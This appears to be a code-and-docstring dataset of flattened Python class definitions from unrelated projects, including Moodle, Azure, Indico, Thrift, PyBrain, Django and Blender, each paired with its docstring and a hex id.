class UpdateField(MoodleDBSession): <NEW_LINE> <INDENT> def __init__(self, database_name, field_name): <NEW_LINE> <INDENT> super().__init__() <NEW_LINE> self.field_name = field_name <NEW_LINE> with self.DBSession() as session: <NEW_LINE> <INDENT> DataFields = self.table_string_to_class('data_fields') <NEW_LINE> Data = self.table_string_to_class('data') <NEW_LINE> statement = session.query(DataFields).select_from(Data). join(DataFields, self.and_( Data.name==database_name, Data.id == DataFields.dataid, DataFields.name == field_name ) ) <NEW_LINE> <DEDENT> self.target = statement.one() <NEW_LINE> self.target_id = self.target.id <NEW_LINE> <DEDENT> def update_menu(self, value): <NEW_LINE> <INDENT> if self.target_id is None: <NEW_LINE> <INDENT> return <NEW_LINE> <DEDENT> if isinstance(value, list): <NEW_LINE> <INDENT> value = "\r\n".join(value) <NEW_LINE> <DEDENT> self.update_table('data_fields', where=dict(id=self.target_id), param1=value) | Class that is used to update a field in a database module | 62599087e1aae11d1e7cf5dc |
class CassandraKeyspaceResource(msrest.serialization.Model): <NEW_LINE> <INDENT> _validation = { 'id': {'required': True}, } <NEW_LINE> _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, } <NEW_LINE> def __init__( self, **kwargs ): <NEW_LINE> <INDENT> super(CassandraKeyspaceResource, self).__init__(**kwargs) <NEW_LINE> self.id = kwargs['id'] | Cosmos DB Cassandra keyspace resource object.
All required parameters must be populated in order to send to Azure.
:param id: Required. Name of the Cosmos DB Cassandra keyspace.
:type id: str | 625990878a349b6b43687df0 |
class RHTicketConfigQRCodeImage(RHManageRegFormBase): <NEW_LINE> <INDENT> def _process(self): <NEW_LINE> <INDENT> qr = qrcode.QRCode( version=6, error_correction=qrcode.constants.ERROR_CORRECT_M, box_size=4, border=1 ) <NEW_LINE> checkin_app = OAuthApplication.find_one(system_app_type=SystemAppType.checkin) <NEW_LINE> qr_data = { "event_id": self.event.id, "title": self.event.title, "date": self.event.start_dt.isoformat(), "version": 1, "server": { "base_url": config.BASE_URL, "consumer_key": checkin_app.client_id, "auth_url": url_for('oauth.oauth_authorize', _external=True), "token_url": url_for('oauth.oauth_token', _external=True) } } <NEW_LINE> json_qr_data = json.dumps(qr_data) <NEW_LINE> qr.add_data(json_qr_data) <NEW_LINE> qr.make(fit=True) <NEW_LINE> qr_img = qr.make_image() <NEW_LINE> output = BytesIO() <NEW_LINE> qr_img.save(output) <NEW_LINE> output.seek(0) <NEW_LINE> return send_file('config.png', output, 'image/png') | Display configuration QRCode. | 62599087ec188e330fdfa43f |
class my_error(Exception): <NEW_LINE> <INDENT> def __init__(self, msg): <NEW_LINE> <INDENT> self.msg = msg | My own exception class
Attributes:
msg -- explanation of the error | 625990877047854f46340f47 |
class XorEncoder(object): <NEW_LINE> <INDENT> def encode(self,data,key): <NEW_LINE> <INDENT> if len(data) % len(key) != 0: <NEW_LINE> <INDENT> raise "Data length must be a multiple of key length" <NEW_LINE> <DEDENT> key_idx=0 <NEW_LINE> xor_data="" <NEW_LINE> for x in range(len(data)): <NEW_LINE> <INDENT> xor_data=xor_data+chr(ord(data[x]) ^ ord(key[key_idx])) <NEW_LINE> key_idx=(key_idx + 1) % len(key) <NEW_LINE> <DEDENT> return xor_data | Base class for architecture-specific XOR encoders. Provides self.encode(). | 62599087aad79263cf43034c |
class GetLatestDocumentsTestCase(TestCase): <NEW_LINE> <INDENT> longMessage = True <NEW_LINE> def test_tag(self): <NEW_LINE> <INDENT> baker.make('document_library.DocumentTranslation', language_code='en', is_published=True) <NEW_LINE> baker.make('document_library.DocumentTranslation', language_code='en', is_published=True) <NEW_LINE> baker.make('document_library.DocumentTranslation', language_code='en', is_published=True) <NEW_LINE> baker.make('document_library.DocumentTranslation', language_code='en', is_published=False) <NEW_LINE> req = RequestFactory().get('/') <NEW_LINE> req.LANGUAGE_CODE = 'en' <NEW_LINE> context = RequestContext(req) <NEW_LINE> result = document_library_tags.get_latest_documents(context) <NEW_LINE> self.assertEqual(result.count(), 3, msg=( 'Should return up to five published documents')) <NEW_LINE> result = document_library_tags.get_latest_documents(context, count=2) <NEW_LINE> self.assertEqual(result.count(), 2, msg=( 'Should return the requested number of published documents')) | Tests for the ``get_latest_documents`` templatetag. | 6259908797e22403b383ca8a
class getSquareChatAnnouncements_result(object): <NEW_LINE> <INDENT> def __init__(self, success=None, e=None,): <NEW_LINE> <INDENT> self.success = success <NEW_LINE> self.e = e <NEW_LINE> <DEDENT> def read(self, iprot): <NEW_LINE> <INDENT> if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None: <NEW_LINE> <INDENT> iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec]) <NEW_LINE> return <NEW_LINE> <DEDENT> iprot.readStructBegin() <NEW_LINE> while True: <NEW_LINE> <INDENT> (fname, ftype, fid) = iprot.readFieldBegin() <NEW_LINE> if ftype == TType.STOP: <NEW_LINE> <INDENT> break <NEW_LINE> <DEDENT> if fid == 0: <NEW_LINE> <INDENT> if ftype == TType.STRUCT: <NEW_LINE> <INDENT> self.success = GetSquareChatAnnouncementsResponse() <NEW_LINE> self.success.read(iprot) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> iprot.skip(ftype) <NEW_LINE> <DEDENT> <DEDENT> elif fid == 1: <NEW_LINE> <INDENT> if ftype == TType.STRUCT: <NEW_LINE> <INDENT> self.e = SquareException() <NEW_LINE> self.e.read(iprot) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> iprot.skip(ftype) <NEW_LINE> <DEDENT> <DEDENT> else: <NEW_LINE> <INDENT> iprot.skip(ftype) <NEW_LINE> <DEDENT> iprot.readFieldEnd() <NEW_LINE> <DEDENT> iprot.readStructEnd() <NEW_LINE> <DEDENT> def write(self, oprot): <NEW_LINE> <INDENT> if oprot._fast_encode is not None and self.thrift_spec is not None: <NEW_LINE> <INDENT> oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec])) <NEW_LINE> return <NEW_LINE> <DEDENT> oprot.writeStructBegin('getSquareChatAnnouncements_result') <NEW_LINE> if self.success is not None: <NEW_LINE> <INDENT> oprot.writeFieldBegin('success', TType.STRUCT, 0) <NEW_LINE> self.success.write(oprot) <NEW_LINE> oprot.writeFieldEnd() <NEW_LINE> <DEDENT> if self.e is not None: <NEW_LINE> <INDENT> oprot.writeFieldBegin('e', TType.STRUCT, 1) <NEW_LINE> self.e.write(oprot) <NEW_LINE> oprot.writeFieldEnd() <NEW_LINE> <DEDENT> oprot.writeFieldStop() <NEW_LINE> oprot.writeStructEnd() <NEW_LINE> <DEDENT> def validate(self): <NEW_LINE> <INDENT> return <NEW_LINE> <DEDENT> def __repr__(self): <NEW_LINE> <INDENT> L = ['%s=%r' % (key, value) for key, value in self.__dict__.items()] <NEW_LINE> return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) <NEW_LINE> <DEDENT> def __eq__(self, other): <NEW_LINE> <INDENT> return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ <NEW_LINE> <DEDENT> def __ne__(self, other): <NEW_LINE> <INDENT> return not (self == other) | Attributes:
- success
- e | 62599087dc8b845886d5514c |
@Wrapper.register("reptile") <NEW_LINE> class ReptileWrapper(_FOWrapper): <NEW_LINE> <INDENT> _all_grads = True <NEW_LINE> def __init__( self, model: Model, meta_optimizer: torch.optim.Optimizer, optimizer_cls: str, optimizer_kwargs: Dict[str, Any], grad_norm: Optional[float] = None, grad_clipping: Optional[float] = None, update_hook: Callable = None, inherit: bool = False, loss_ratios_per_step: List[Dict[str, int]] = None, ): <NEW_LINE> <INDENT> super(ReptileWrapper, self).__init__( model=model, meta_optimizer=meta_optimizer, optimizer_cls=optimizer_cls, optimizer_kwargs=optimizer_kwargs, grad_norm=grad_norm, grad_clipping=grad_clipping, update_hook=update_hook, inherit=inherit, loss_ratios_per_step=loss_ratios_per_step, ) <NEW_LINE> trainable_params = filter(lambda p: p.requires_grad, self._container.parameters()) <NEW_LINE> self.optimizer = self.optimizer_cls( trainable_params, **self.optimizer_kwargs) | Wrapper for Reptile.
Arguments:
model (nn.Module): classifier.
optimizer_cls: optimizer class.
meta_optimizer_cls: meta optimizer class.
optimizer_kwargs (dict): kwargs to pass to optimizer upon construction.
meta_optimizer_kwargs (dict): kwargs to pass to meta optimizer upon construction. | 62599087091ae356687067d5 |
class MassExportItemsDialog(MassSelectItemsDialog): <NEW_LINE> <INDENT> data_submitted = Signal(object) <NEW_LINE> def __init__(self, parent, db_mngr, *db_maps): <NEW_LINE> <INDENT> super().__init__(parent, db_mngr, *db_maps) <NEW_LINE> self.setWindowTitle("Export items") <NEW_LINE> <DEDENT> def accept(self): <NEW_LINE> <INDENT> super().accept() <NEW_LINE> db_map_items_for_export = { db_map: [item_type for item_type, check_box in self.item_check_boxes.items() if check_box.isChecked()] for db_map, check_box in self.db_map_check_boxes.items() if check_box.isChecked() } <NEW_LINE> self.data_submitted.emit(db_map_items_for_export) | A dialog to let users choose items for JSON export. | 62599087ec188e330fdfa441
class PublisherViewSet(viewsets.ModelViewSet): <NEW_LINE> <INDENT> serializer_class = PublisherSerializer <NEW_LINE> queryset = Publisher.objects.all() | ViewSet for Publishers | 625990872c8b7c6e89bd537a |
class RuleArray(object): <NEW_LINE> <INDENT> def __init__(self, rules=None): <NEW_LINE> <INDENT> self.swagger_types = { 'rules': 'list[OutputRule]' } <NEW_LINE> self.attribute_map = { 'rules': 'rules' } <NEW_LINE> self._rules = rules <NEW_LINE> <DEDENT> @property <NEW_LINE> def rules(self): <NEW_LINE> <INDENT> return self._rules <NEW_LINE> <DEDENT> @rules.setter <NEW_LINE> def rules(self, rules): <NEW_LINE> <INDENT> self._rules = rules <NEW_LINE> <DEDENT> def to_dict(self): <NEW_LINE> <INDENT> result = {} <NEW_LINE> for attr, _ in iteritems(self.swagger_types): <NEW_LINE> <INDENT> value = getattr(self, attr) <NEW_LINE> if isinstance(value, list): <NEW_LINE> <INDENT> result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) <NEW_LINE> <DEDENT> elif hasattr(value, "to_dict"): <NEW_LINE> <INDENT> result[attr] = value.to_dict() <NEW_LINE> <DEDENT> elif isinstance(value, dict): <NEW_LINE> <INDENT> result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> result[attr] = value <NEW_LINE> <DEDENT> <DEDENT> return result <NEW_LINE> <DEDENT> def to_str(self): <NEW_LINE> <INDENT> return pformat(self.to_dict()) <NEW_LINE> <DEDENT> def __repr__(self): <NEW_LINE> <INDENT> return self.to_str() <NEW_LINE> <DEDENT> def __eq__(self, other): <NEW_LINE> <INDENT> if not isinstance(other, RuleArray): <NEW_LINE> <INDENT> return False <NEW_LINE> <DEDENT> return self.__dict__ == other.__dict__ <NEW_LINE> <DEDENT> def __ne__(self, other): <NEW_LINE> <INDENT> return not self == other | NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually. | 6259908771ff763f4b5e9342 |
class ModelRelationshipModification(BaseModel): <NEW_LINE> <INDENT> operation = SmallIntegerField( validators=[MinValueValidator(-1), MaxValueValidator(1)], null=True, choices=DjangoOperations, ) <NEW_LINE> field = ForeignKey(ModelField, on_delete=CASCADE) <NEW_LINE> entry = ForeignKey(ModelEntry, on_delete=CASCADE) <NEW_LINE> event = ForeignKey(ModelEvent, on_delete=CASCADE, related_name='relationships') <NEW_LINE> class Meta: <NEW_LINE> <INDENT> verbose_name = "Model Entry Event Relationship Modification" <NEW_LINE> verbose_name_plural = "Model Entry Event Relationship Modifications" <NEW_LINE> <DEDENT> class LoggingIgnore: <NEW_LINE> <INDENT> complete = True <NEW_LINE> <DEDENT> def __str__(self) -> str: <NEW_LINE> <INDENT> operation = Operation(self.operation) <NEW_LINE> past = {v: k for k, v in PastM2MOperationMap.items()}[operation] <NEW_LINE> return ( f'[{self.field.mirror.application}:' f'{self.field.mirror.name}:' f'{self.field.name}] ' f'{past} {self.entry}' ) <NEW_LINE> <DEDENT> def short(self) -> str: <NEW_LINE> <INDENT> operation = Operation(self.operation) <NEW_LINE> shorthand = {v: k for k, v in ShortOperationMap.items()}[operation] <NEW_LINE> return f'{shorthand}{self.entry.short()}' <NEW_LINE> <DEDENT> def medium(self) -> [str, str]: <NEW_LINE> <INDENT> operation = Operation(self.operation) <NEW_LINE> shorthand = {v: k for k, v in ShortOperationMap.items()}[operation] <NEW_LINE> return f'{shorthand}{self.field.name}', f'{self.entry.short()}' | Used to record the model entry event modifications of relationships. (M2M, Foreign)
The operation attribute can have 4 valid values:
-1 (delete), 0 (modify), 1 (create), None (n/a)
field is the field where the relationship changed (entry got added or removed)
and model is the entry that got removed/added from the relationship. | 62599087fff4ab517ebcf3ab |
class ICountryportlet(IPortletDataProvider): <NEW_LINE> <INDENT> pass | Define your portlet schema here | 6259908763b5f9789fe86cfe |
class PolicyGradientAgent(LearningAgent): <NEW_LINE> <INDENT> def __init__(self, module, learner = None): <NEW_LINE> <INDENT> assert isinstance(module, FeedForwardNetwork) <NEW_LINE> assert len(module.outmodules) == 1 <NEW_LINE> LearningAgent.__init__(self, module, learner) <NEW_LINE> self.explorationlayer = GaussianLayer(self.outdim, name='gauss') <NEW_LINE> self.explorationlayer.setSigma([-2] * self.outdim) <NEW_LINE> out = self.module.outmodules.pop() <NEW_LINE> self.module.addOutputModule(self.explorationlayer) <NEW_LINE> self.module.addConnection(IdentityConnection(out, self.module['gauss'])) <NEW_LINE> self.module.sortModules() <NEW_LINE> self.learner.setModule(self.module) <NEW_LINE> self.history.addField('loglh', self.module.paramdim) <NEW_LINE> self.history.link.append('loglh') <NEW_LINE> self.loglh = None <NEW_LINE> <DEDENT> def enableLearning(self): <NEW_LINE> <INDENT> LearningAgent.enableLearning(self) <NEW_LINE> self.explorationlayer.enabled = True <NEW_LINE> <DEDENT> def disableLearning(self): <NEW_LINE> <INDENT> LearningAgent.disableLearning(self) <NEW_LINE> self.explorationlayer.enabled = False <NEW_LINE> <DEDENT> def setSigma(self, sigma): <NEW_LINE> <INDENT> assert len(sigma) == self.explorationlayer.paramdim <NEW_LINE> self.explorationlayer._setParameters(sigma, self.module) <NEW_LINE> <DEDENT> def getSigma(self): <NEW_LINE> <INDENT> return self.explorationlayer.params <NEW_LINE> <DEDENT> def setParameters(self, params): <NEW_LINE> <INDENT> self.module._setParameters(params) <NEW_LINE> self.learner.setModule(self.module) <NEW_LINE> <DEDENT> def getAction(self): <NEW_LINE> <INDENT> HistoryAgent.getAction(self) <NEW_LINE> self.lastaction = self.module.activate(self.lastobs).copy() <NEW_LINE> self.module.backward() <NEW_LINE> self.loglh = self.module.derivs.copy() <NEW_LINE> d = self.module.derivs <NEW_LINE> d *= 0 <NEW_LINE> self.module.reset() <NEW_LINE> return self.lastaction <NEW_LINE> <DEDENT> def giveReward(self, r): <NEW_LINE> <INDENT> assert self.lastobs != None <NEW_LINE> assert self.lastaction != None <NEW_LINE> if self.remember: <NEW_LINE> <INDENT> self.history.appendLinked(self.lastobs, self.lastaction, r, self.loglh) <NEW_LINE> <DEDENT> self.lastobs = None <NEW_LINE> self.lastaction = None | PolicyGradientAgent is a learning agent, that adds a GaussianLayer to
its module and stores the log likelihoods (loglh) in the dataset. It is used
for rllearners like enac, reinforce, gpomdp, ... | 6259908726068e7796d4e4d8 |
class BaseDownloadWorker(object): <NEW_LINE> <INDENT> def process(self, request): <NEW_LINE> <INDENT> raise NotImplementedError() | Download worker interface | 625990873346ee7daa33842d |
class TCol: <NEW_LINE> <INDENT> B = '\033[1m' <NEW_LINE> RB = '\033[21m' <NEW_LINE> RE = '\033[91m' <NEW_LINE> GR = '\033[92m' <NEW_LINE> BL = '\033[94m' <NEW_LINE> ST = '\033[0m' | Class for the color escape sequences | 62599087e1aae11d1e7cf5de
class NotebookTab: <NEW_LINE> <INDENT> @make_thread_safe <NEW_LINE> def __init__(self, widget, **kwargs): <NEW_LINE> <INDENT> if not isinstance(widget.parent, Notebook): <NEW_LINE> <INDENT> raise ValueError("widgets of NotebookTabs must be child widgets " "of a Notebook, but %r is a child widget of %r" % (widget, widget.parent)) <NEW_LINE> <DEDENT> if widget in widget.parent._tab_objects: <NEW_LINE> <INDENT> raise RuntimeError("there is already a NotebookTab of %r" % (widget,)) <NEW_LINE> <DEDENT> self.widget = widget <NEW_LINE> self.config = TabConfigDict(self) <NEW_LINE> self.initial_options = kwargs <NEW_LINE> widget.parent._tab_objects[widget] = self <NEW_LINE> <DEDENT> def __repr__(self): <NEW_LINE> <INDENT> item_reprs = ['%s=%r' % pair for pair in self.initial_options.items()] <NEW_LINE> return '%s(%s)' % ( type(self).__name__, ', '.join([repr(self.widget)] + item_reprs)) <NEW_LINE> <DEDENT> def _check_in_notebook(self): <NEW_LINE> <INDENT> if self not in self.widget.parent: <NEW_LINE> <INDENT> raise RuntimeError("the tab is not in the notebook yet") <NEW_LINE> <DEDENT> <DEDENT> def hide(self): <NEW_LINE> <INDENT> self._check_in_notebook() <NEW_LINE> self.widget.parent._call(None, self.widget.parent, 'hide', self.widget) <NEW_LINE> <DEDENT> def unhide(self): <NEW_LINE> <INDENT> self._check_in_notebook() <NEW_LINE> self.widget.parent._call(None, self.widget.parent, 'add', self.widget) | Represents a tab that is in a notebook, or is ready to be added to a
notebook.
The *widget* must be a child widget of a :class:`.Notebook` widget. Each
:class:`.NotebookTab` belongs to the widget's parent notebook; for example,
if you create a tab like this...
::
tab = teek.NotebookTab(teek.Label(asd_notebook, "hello"))
...then the tab cannot be added to any other notebook widget than
``asd_notebook``, because ``asd_notebook`` is the parent widget of the
label.
Most methods raise :exc:`RuntimeError` if the tab has not been added to the
notebook yet. This includes doing pretty much anything with :attr:`config`.
For convenience, options can be passed when creating a
:class:`.NotebookTab`, so that this...
::
notebook.append(teek.NotebookTab(some_widget, text="Tab Title"))
...does the same thing as this::
tab = teek.NotebookTab(some_widget, text="Tab Title")
notebook.append(tab)
tab.config['text'] = "Tab Title"
There are never multiple :class:`NotebookTab` objects that represent the
same tab.
.. attribute:: config
Similar to the ``config`` attribute that widgets have. The available
options are documented as ``TAB OPTIONS`` in :man:`ttk_notebook(3tk)`.
Attempting to use this raises :exc:`RuntimeError` if the tab hasn't
been added to the notebook yet.
.. attribute:: widget
This attribute and initialization argument is the widget in the tab. It
should be a child widget of the notebook. Use ``tab.widget.parent`` to
access the :class:`.Notebook` that the tab belongs to.
.. attribute:: initial_options
A dict of keyword arguments passed to NotebookTab. When the tab is
added to the notebook for the first time, :attr:`.config` is updated
from this dict. | 6259908750812a4eaa621990 |
class DeclarationGroupNode(NonValuedExpressionNode): <NEW_LINE> <INDENT> def _get_declarations(self): <NEW_LINE> <INDENT> return self._declarations <NEW_LINE> <DEDENT> declarations = property(_get_declarations) <NEW_LINE> def __init__(self): <NEW_LINE> <INDENT> super(DeclarationGroupNode, self).__init__() <NEW_LINE> self._declarations = [] <NEW_LINE> <DEDENT> def collect_definitions(self, scope, errors): <NEW_LINE> <INDENT> raise NotImplementedError() <NEW_LINE> <DEDENT> def generate_dot(self, generator): <NEW_LINE> <INDENT> me = generator.add_node(str(self.__class__.__name__)) <NEW_LINE> for declaration in self.declarations: <NEW_LINE> <INDENT> declaration = declaration.generate_dot(generator) <NEW_LINE> generator.add_edge(me, declaration) <NEW_LINE> <DEDENT> return me | Class C{DeclarationGroupNode} of the abstract syntax tree.
This node of the abstract syntax tree is the base class of the
C{TypeDeclarationGroupNode} and C{FunctionDeclarationGroupNode} nodes,
which represent a group of consecutive type or function declarations,
respectively. These nodes have the purpose of guaranteeing, during
semantic checking, that no variable declarations are made between
declarations of mutually recursive types or functions, since this
would produce ambiguous situations. | 625990873617ad0b5ee07ce7
class PassThrough(ExplicitComponent): <NEW_LINE> <INDENT> def __init__(self, i_var, o_var, val, units=None): <NEW_LINE> <INDENT> super(PassThrough, self).__init__() <NEW_LINE> self.i_var = i_var <NEW_LINE> self.o_var = o_var <NEW_LINE> self.units = units <NEW_LINE> self.val = val <NEW_LINE> if isinstance(val, (float, int)) or np.isscalar(val): <NEW_LINE> <INDENT> size = 1 <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> size = np.prod(val.shape) <NEW_LINE> <DEDENT> self.size = size <NEW_LINE> <DEDENT> def setup(self): <NEW_LINE> <INDENT> if self.units is None: <NEW_LINE> <INDENT> self.add_input(self.i_var, self.val) <NEW_LINE> self.add_output(self.o_var, self.val) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> self.add_input(self.i_var, self.val, units=self.units) <NEW_LINE> self.add_output(self.o_var, self.val, units=self.units) <NEW_LINE> <DEDENT> row_col = np.arange(self.size) <NEW_LINE> self.declare_partials(of=self.o_var, wrt=self.i_var, val=1, rows=row_col, cols=row_col) <NEW_LINE> <DEDENT> def compute(self, inputs, outputs): <NEW_LINE> <INDENT> outputs[self.o_var] = inputs[self.i_var] <NEW_LINE> <DEDENT> def linearize(self, inputs, outputs, J): <NEW_LINE> <INDENT> pass | Helper component that is needed when variables must be passed
directly from input to output | 6259908771ff763f4b5e9344 |
class TreeNode: <NEW_LINE> <INDENT> def __init__(self, data): <NEW_LINE> <INDENT> self.data = data <NEW_LINE> self.left = None <NEW_LINE> self.right = None <NEW_LINE> self.parent = None | Node with left and right children | 6259908799fddb7c1ca63ba7 |
class UsuarioGestionForm(forms.ModelForm): <NEW_LINE> <INDENT> username = forms.RegexField( label=("Nombre de usuario"), max_length=30, regex=r"^[\w.@+-]+$", help_text=("Required. 30 characters or fewer. Letters, digits and " "@/./+/-/_ only."), error_messages={ 'invalid': ("This value may contain only letters, numbers and " "@/./+/-/_ characters.")}) <NEW_LINE> password = ReadOnlyPasswordHashField(label=("Contraseña"), help_text=("Las contraseñas no se almacenan en bruto, así que no hay manera de ver la contraseña del usuario," " pero se puede cambiar mediante <a href=\"password/\">este formulario</a>. ")) <NEW_LINE> class Meta: <NEW_LINE> <INDENT> model = User <NEW_LINE> fields = ('username', 'password', 'email', 'first_name', 'last_name', 'telefono', 'direccion') <NEW_LINE> fieldsets = [ ( None, {'fields': ['username', 'password']}), ('Informacion personal', {'fields': ['email', 'first_name', 'last_name', 'telefono', 'direccion'], 'classes': ['collapse']}), ] <NEW_LINE> <DEDENT> def __init__(self, *args, **kwargs): <NEW_LINE> <INDENT> super(UsuarioGestionForm, self).__init__(*args, **kwargs) <NEW_LINE> f = self.fields.get('user_permissions', None) <NEW_LINE> if f is not None: <NEW_LINE> <INDENT> f.queryset = f.queryset.select_related('content_type') <NEW_LINE> <DEDENT> <DEDENT> def clean_password(self): <NEW_LINE> <INDENT> return self.initial["password"] <NEW_LINE> <DEDENT> widgets = {} | Form for modifying users
Inherits from forms.ModelForm and uses the user class to
add certain fields at modification time | 6259908726068e7796d4e4da
class Clusters(ListModel): <NEW_LINE> <INDENT> _attribute_map = { 'clusters': {'type': list}, } <NEW_LINE> _attribute_defaults = {'clusters': []} <NEW_LINE> _list_attr = 'clusters' <NEW_LINE> _list_class = Cluster | Representation of a group of one or more Clusters. | 62599087099cdd3c636761c6 |
class Server(object): <NEW_LINE> <INDENT> def __init__(self, port, service_info): <NEW_LINE> <INDENT> global monitoring_info <NEW_LINE> monitoring_info = service_info <NEW_LINE> self.__server = SocketServer.TCPServer(('', port), RequestHandler) <NEW_LINE> <DEDENT> def start(self): <NEW_LINE> <INDENT> self.__server.serve_forever() <NEW_LINE> <DEDENT> def start_async(self): <NEW_LINE> <INDENT> server_thread = Thread(target=self.start) <NEW_LINE> server_thread.start() | HTTP server to get monitoring info.
| 6259908792d797404e389928 |
class MonsterFlairCondition(EventCondition): <NEW_LINE> <INDENT> name = "monster_flair" <NEW_LINE> def test(self, session: Session, condition: MapCondition) -> bool: <NEW_LINE> <INDENT> slot = int(condition.parameters[0]) <NEW_LINE> category = condition.parameters[1] <NEW_LINE> name = condition.parameters[2] <NEW_LINE> monster = session.player.monsters[slot] <NEW_LINE> try: <NEW_LINE> <INDENT> return monster.flairs[category].name == name <NEW_LINE> <DEDENT> except KeyError: <NEW_LINE> <INDENT> return False <NEW_LINE> <DEDENT> return False | Check to see if the given monster flair matches the expected value.
Script usage:
.. code-block::
is monster_flair <slot>,<category>,<name>
Script parameters:
slot: Position of the monster in the player monster list.
category: Category of the flair.
name: Name of the flair. | 625990872c8b7c6e89bd537e |
class Statistics: <NEW_LINE> <INDENT> def __init__(self, save_path: Path = DEFAULT_SAVE_PATH) -> None: <NEW_LINE> <INDENT> assert isinstance(save_path, Path) <NEW_LINE> self.save_path = save_path <NEW_LINE> self._load_data() <NEW_LINE> self.env = TrueSkill() <NEW_LINE> backends.choose_backend("scipy") <NEW_LINE> <DEDENT> def save(self, ranking: Optional[List[str]] = None) -> None: <NEW_LINE> <INDENT> if ranking: <NEW_LINE> <INDENT> assert isinstance(ranking, list) <NEW_LINE> assert isinstance(ranking[0], str) <NEW_LINE> self.data.all_rankings.append(ranking) <NEW_LINE> <DEDENT> self._save_data() <NEW_LINE> <DEDENT> @property <NEW_LINE> def all_players(self) -> Set[str]: <NEW_LINE> <INDENT> return {name for ranking in self.data.all_rankings for name in ranking} <NEW_LINE> <DEDENT> def true_skill(self) -> Dict[str, Rating]: <NEW_LINE> <INDENT> rankings = {name: self.env.create_rating() for name in self.all_players} <NEW_LINE> for game in self.data.all_rankings: <NEW_LINE> <INDENT> rating_groups = [[rankings[name]] for name in game] <NEW_LINE> ranks = list(range(len(game))) <NEW_LINE> ratings = self.env.rate(rating_groups=rating_groups, ranks=ranks) <NEW_LINE> for name, ranking in zip(game, ratings): <NEW_LINE> <INDENT> rankings[name] = ranking[0] <NEW_LINE> <DEDENT> <DEDENT> sorted_rankings = sorted( rankings.items(), key=lambda r: self.env.expose(r[1]), reverse=True ) <NEW_LINE> return dict(sorted_rankings) <NEW_LINE> <DEDENT> def win_probability(self, players: List[str]) -> Dict[str, float]: <NEW_LINE> <INDENT> if len(players) != 2: <NEW_LINE> <INDENT> raise NotImplementedError( "Win probability is only implemented for two players." ) <NEW_LINE> <DEDENT> true_skills = self.true_skill() <NEW_LINE> player_1 = true_skills.get(players[0], Rating()) <NEW_LINE> player_2 = true_skills.get(players[1], Rating()) <NEW_LINE> draw_probability = quality_1vs1(player_1, player_2) <NEW_LINE> delta_mu = player_1.mu - player_2.mu <NEW_LINE> denominator = np.sqrt(player_1.sigma ** 2 + player_2.sigma ** 2) <NEW_LINE> player_1_win_chance = self.env.cdf(delta_mu / denominator) <NEW_LINE> player_2_win_chance = 1 - player_1_win_chance <NEW_LINE> return { "draw": draw_probability, "player_1": player_1_win_chance, "player_2": player_2_win_chance, } <NEW_LINE> <DEDENT> def _load_data(self) -> None: <NEW_LINE> <INDENT> assert self.save_path.is_absolute() <NEW_LINE> self.save_path.parent.mkdir(parents=True, exist_ok=True) <NEW_LINE> if not self.save_path.exists(): <NEW_LINE> <INDENT> self.save_path.touch() <NEW_LINE> self.data = Data() <NEW_LINE> self._save_data() <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> self.data = pickle.loads(self.save_path.read_bytes()) <NEW_LINE> <DEDENT> <DEDENT> def _save_data(self) -> None: <NEW_LINE> <INDENT> self.save_path.write_bytes( data=pickle.dumps(self.data, protocol=pickle.HIGHEST_PROTOCOL) ) | Class for saving and retrieval of statistics.
This is the main class of this module, and this is considered the public
API. | 6259908797e22403b383ca90 |
class InvalidProtocol(ZmailException, ValueError): <NEW_LINE> <INDENT> pass | Invalid protocol settings used. | 62599087d8ef3951e32c8c2a |
class CoverageConfig(EnvironmentConfig): <NEW_LINE> <INDENT> def __init__(self, args): <NEW_LINE> <INDENT> super(CoverageConfig, self).__init__(args, 'coverage') <NEW_LINE> self.group_by = frozenset(args.group_by) if 'group_by' in args and args.group_by else set() <NEW_LINE> self.all = args.all if 'all' in args else False <NEW_LINE> self.stub = args.stub if 'stub' in args else False <NEW_LINE> self.coverage = False | Configuration for the coverage command. | 6259908760cbc95b06365b38 |
class ClassParticleEdit(Operator): <NEW_LINE> <INDENT> bl_idname = "class.pieparticleedit" <NEW_LINE> bl_label = "Class Particle Edit" <NEW_LINE> bl_options = {'REGISTER', 'UNDO'} <NEW_LINE> bl_description = "Particle Edit (must have active particle system)" <NEW_LINE> def execute(self, context): <NEW_LINE> <INDENT> if context.object.mode == "EDIT": <NEW_LINE> <INDENT> bpy.ops.object.mode_set(mode="OBJECT") <NEW_LINE> bpy.ops.particle.particle_edit_toggle() <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> bpy.ops.particle.particle_edit_toggle() <NEW_LINE> <DEDENT> return {'FINISHED'} | Particle Edit | 62599087656771135c48adfd |
